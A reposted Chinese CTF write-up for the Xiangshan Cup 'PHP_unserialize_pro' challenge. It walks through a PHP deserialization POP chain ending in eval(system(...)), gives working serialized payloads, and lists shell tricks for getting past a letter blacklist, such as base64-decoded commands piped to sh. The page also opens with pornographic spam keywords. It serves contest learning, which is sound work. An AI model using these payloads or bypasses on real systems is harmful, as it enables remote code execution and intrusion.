国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

[wp]2023中山市第三屆香山杯 web PHP_unserialize_pro

這篇具有很好參考價值的文章主要介紹了[wp]2023中山市第三屆香山杯 web PHP_unserialize_pro。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報違法"按鈕提交疑問。

PHP_unserialize_pro

考點(diǎn):

  1. 反序列化漏洞POP的構(gòu)造
  2. eval()函數(shù)惡意php代碼執(zhí)行
  3. []通配的形式繞過黑名單字母

源代碼:

<?php
????error_reporting(0);
????class?Welcome{
????????public?$name;
????????public?$arg?=?'welcome';
????????public?function?__construct(){
????????????$this->name?=?'Wh0?4m?I?';
????????}
????????public?function?__destruct(){
????????????if($this->name?==?'A_G00d_H4ck3r'){
????????????????echo?$this->arg;
????????????}
????????}
????}

????class?G00d{
????????public?$shell;
????????public?$cmd;
????????public?function?__invoke(){
????????????$shell?=?$this->shell;
????????????$cmd?=?$this->cmd;
????????????if(preg_match('/f|l|a|g|\*|\?/i',?$cmd)){
????????????????die("U?R?A?BAD?GUY");
????????????}
????????????eval($shell($cmd));
????????}
????}

????class?H4ck3r{
????????public?$func;
????????public?function?__toString(){
????????????$function?=?$this->func;
????????????$function();
????????}
????}

????if(isset($_GET['data']))
????????unserialize($_GET['data']);
????else
????????highlight_file(__FILE__);
?>

代碼審計:

先找出口函數(shù):為eval() 然后執(zhí)行eval()函數(shù) 就必須觸發(fā)__invoke()魔術(shù)方法,

__invoke():當(dāng)嘗試以調(diào)用函數(shù)的方式調(diào)用一個對象時,__invoke() 方法會被自動調(diào)用。

所以我們只要令H4ck3r類里面的$func?= new G00d()就可以觸發(fā)了,然后調(diào)用func函數(shù)就要觸發(fā)__toString()魔術(shù)方法,

__toString():當(dāng)一個對象被當(dāng)作一個字符串時使用

所以我們就要調(diào)用Welcome里面的arg令它當(dāng)成G00d()函數(shù)就行 ?然后就是觸發(fā)__destruct()

條件就是要銷毀一個對象 那就要創(chuàng)建對象 就觸發(fā)了__construct()魔術(shù)方法

POP鏈:

__construct->__destruct()->__toString()->__invoke()?

代碼構(gòu)造;

<?php
class Welcome
{
????public $name = 'A_G00d_H4ck3r';
????public $arg = 'welcome';
}
class G00d
{
????public $shell = 'system';
????public $cmd = 'dir /';
}
class H4ck3r
{
????public $func;
}
$m = new Welcome();
$m->arg = new H4ck3r();
$m->arg->func = new G00d();
echo serialize($m);

Payload:?data=O:7:"Welcome":2:{s:4:"name";s:13:"A_G00d_H4ck3r";s:3:"arg";O:6:"H4ck3r":1:{s:4:"func";O:4:"G00d":2:{s:5:"shell";s:6:"system";s:3:"cmd";s:5:"dir /";}}}

[wp]2023中山市第三屆香山杯 web PHP_unserialize_pro,反序列化漏洞,CTF,writeup,web安全,代碼復(fù)審

發(fā)現(xiàn)f1ag 因為黑名單的限制 所有匹配flag字母都會被禁止 這里就采用通配符[]進(jìn)行繞過

[wp]2023中山市第三屆香山杯 web PHP_unserialize_pro,反序列化漏洞,CTF,writeup,web安全,代碼復(fù)審

關(guān)于某個字母被ban的繞過方法

1. 反斜線轉(zhuǎn)義 cat fla\g.php

2. 兩個單引號做分隔 cat fl''ag.php

3. base64編碼繞過 echo Y2F0IGZsYWcucGhw | base64 -d | sh

4. hex編碼繞過 echo 63617420666c61672e706870 | xxd -r -p | bash

5. glob通配符 cat f[k-m]ag.php ??cat f[l]ag.php

6. ?和*

7. cat f{k..m}ag.php

8. 定義變量做拼接 a=g.php; cat fla$a

9. 內(nèi)聯(lián)執(zhí)行cat `echo 666c61672e706870 | xxd -r -p` 或 cat $(echo 666c61672e706870 | xxd -r -p) 或 echo 666c61672e706870 | xxd -r -p | xargs cat

所以最終paylo:

?data=O:7:"Welcome":2:{s:4:"name";s:13:"A_G00d_H4ck3r";s:3:"arg";O:6:"H4ck3r":1:{s:4:"func";O:4:"G00d":2:{s:5:"shell";s:6:"system";s:3:"cmd";s:22:"more /[b-z]1[@-z][b-z]";}}}

[wp]2023中山市第三屆香山杯 web PHP_unserialize_pro,反序列化漏洞,CTF,writeup,web安全,代碼復(fù)審

得到falg文章來源地址http://www.zghlxwxcb.cn/news/detail-712932.html

到了這里,關(guān)于[wp]2023中山市第三屆香山杯 web PHP_unserialize_pro的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點(diǎn)擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 2023第三屆”紅明谷“杯網(wǎng)絡(luò)安全大賽 Writeup By AheadSec

    2023第三屆”紅明谷“杯網(wǎng)絡(luò)安全大賽 Writeup By AheadSec

    修改前端js代碼,將連點(diǎn)10次處的 clickDecryptBtn(); 循環(huán)次數(shù)改為10000即可,如圖所示: Dreamer cms有nday:https://forum.butian.net/share/2183 其中有一個后臺設(shè)置欄目存在任意文件讀取的漏洞,而且也給了flag位置在 /flag 保存,然后首頁點(diǎn)擊這個欄目即可 返回都是 gzip 格式的數(shù)據(jù),直接用

    2023年04月24日
    瀏覽(25)
  • 征稿 | 第三屆粵港澳大灣區(qū)人工智能與大數(shù)據(jù)論壇(AIBDF 2023)

    征稿 | 第三屆粵港澳大灣區(qū)人工智能與大數(shù)據(jù)論壇(AIBDF 2023)

    第三屆粵港澳大灣區(qū)人工智能與大數(shù)據(jù)論壇(AIBDF 2023) 2023 3rd?Guangdong-Hong Kong-Macao Greater Bay Area Artificial Intelligence And Big Data Forum ? ? ?本次高端論壇圍繞建設(shè)國家數(shù)字經(jīng)濟(jì)創(chuàng)新發(fā)展試驗區(qū)進(jìn)行選題。全面貫徹落實黨的二十大精神,深入貫徹落實關(guān)于發(fā)展數(shù)字經(jīng)濟(jì)的重要指示要

    2024年02月13日
    瀏覽(33)
  • 第三屆計算機(jī)、物聯(lián)網(wǎng)與控制工程國際學(xué)術(shù)會議(CITCE 2023)

    第三屆計算機(jī)、物聯(lián)網(wǎng)與控制工程國際學(xué)術(shù)會議(CITCE 2023)

    第三屆計算機(jī)、物聯(lián)網(wǎng)與控制工程國際學(xué)術(shù)會議(CITCE 2023) The 3rd?International Conference on Computer, Internet of Things and Control Engineering(CITCE 2023) 第三屆計算機(jī)、物聯(lián)網(wǎng)與控制工程國際學(xué)術(shù)會議(CITCE 2023)將于2023年11月3-5日在英國萊斯特召開。 CITCE?2023將圍繞計算機(jī)、物聯(lián)網(wǎng)與控制

    2024年02月11日
    瀏覽(26)
  • 2023年臺州市第三屆網(wǎng)絡(luò)安全技能大賽(MISC)—Black Mamba

    2023年臺州市第三屆網(wǎng)絡(luò)安全技能大賽(MISC)—Black Mamba

    前言:當(dāng)時比賽沒有做出來現(xiàn)在來復(fù)現(xiàn)一下 就當(dāng)記錄一下(這個思路沒想到) 一張圖片 常規(guī)得分離,屬性, LSB ,盲水印等都嘗試過 無果! 考點(diǎn):異或解密(第一次遇到,沒想到) 這里放入 010 發(fā)現(xiàn)底部有沉余字符,與十進(jìn)制 24 異或,得到壓縮包 這里得到壓縮包 然后我們

    2024年02月08日
    瀏覽(15)
  • 【EI會議征稿】第三屆機(jī)械自動化與電子信息工程國際學(xué)術(shù)會議(MAEIE 2023)

    【EI會議征稿】第三屆機(jī)械自動化與電子信息工程國際學(xué)術(shù)會議(MAEIE 2023)

    第三屆機(jī)械自動化與電子信息工程國際學(xué)術(shù)會議(MAEIE 2023)? 第三屆機(jī)械自動化與電子信息工程國際學(xué)術(shù)會議(MAEIE 2023)將于2023年12月15-17日在江蘇南京舉行。本會議通過與業(yè)內(nèi)眾多平臺、社會各團(tuán)體協(xié)力,聚集機(jī)械自動化、電子信息工程等相關(guān)領(lǐng)域的學(xué)者,實現(xiàn)研究成果、

    2024年02月09日
    瀏覽(34)
  • 【EI/SCOPUS檢索】第三屆計算機(jī)視覺、應(yīng)用與算法國際學(xué)術(shù)會議(CVAA 2023)

    【EI/SCOPUS檢索】第三屆計算機(jī)視覺、應(yīng)用與算法國際學(xué)術(shù)會議(CVAA 2023)

    第三屆計算機(jī)視覺、應(yīng)用與算法國際學(xué)術(shù)會議(CVAA 2023) The 3rd?International Conference on Computer Vision, Application and Algorithm ? 2023年第三屆計算機(jī)視覺、應(yīng)用與算法國際學(xué)術(shù)會議(CVAA 2023) 主要圍繞計算機(jī)視覺、計算機(jī)應(yīng)用、計算機(jī)算法等研究領(lǐng)域展開討論。會議旨在為從事相關(guān)科

    2024年02月13日
    瀏覽(25)
  • 第三屆字節(jié)跳動青訓(xùn)營——架構(gòu)學(xué)習(xí)

    架構(gòu)定義:有關(guān)軟件整體結(jié)構(gòu)與組件的抽象描述,用于指導(dǎo)軟件系統(tǒng)各個方面的設(shè)計 常見軟件架構(gòu) 單機(jī):所有功能都實現(xiàn)在一個進(jìn)程里,進(jìn)程部署在單臺機(jī)器上,運(yùn)維時需要停服 C10K問題(Concurrent 10,000 Connection):服務(wù)器如何支持10K個并發(fā)連接,進(jìn)行高性能網(wǎng)絡(luò)編程。解決

    2024年01月18日
    瀏覽(29)
  • 第三屆計算機(jī)能力挑戰(zhàn)賽C語言

    一、單項選擇題 1.題 (3.0分) 以下敘述正確的是()。 A.在C程序,至少要包含一個庫函數(shù) B.C程序的一行可以寫多條語句 C.對一個C程序進(jìn)行編譯就可以生成可執(zhí)行文件 D.C程序中的注釋只能單獨(dú)一行,不能位于某條語句的后面 2.題 (3.0分) 下面選項中,不是C語言的是()。

    2024年02月04日
    瀏覽(28)
  • ctfshow 第三屆愚人杯 easy_php

    這題學(xué)的了一些小tips,這里講解一下。 這里詳細(xì)講解一下使用c繞過wakup。 O標(biāo)識符代表對象類型,而C標(biāo)識符代表類名類型。如果將O替換為C,則在反序列化時會將其解釋為一個新的類名字符串,從而創(chuàng)建一個新的類而不是對象。因為這個新的類沒有被序列化過,所以它沒有任

    2023年04月26日
    瀏覽(20)
  • “美亞杯”第三屆中國電子數(shù)據(jù)取證大賽答案解析(團(tuán)體賽)

    “美亞杯”第三屆中國電子數(shù)據(jù)取證大賽答案解析(團(tuán)體賽)

    Gary 被逮捕后,其計算機(jī)被沒收并送至計算機(jī)取證實驗室。經(jīng)調(diào)查后,執(zhí)法機(jī)關(guān)再逮捕一名疑犯Eric,并檢取其家中計算機(jī)(window 8), 并而根據(jù)其家中計算機(jī)紀(jì)錄, 執(zhí)法機(jī)關(guān)再于其他地方取得一臺與案有關(guān)的服務(wù)器,而該服務(wù)器內(nèi)含四個硬盤。該服務(wù)器是運(yùn)行LINUX 系統(tǒng)。 由于事件涉

    2024年02月12日
    瀏覽(58)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包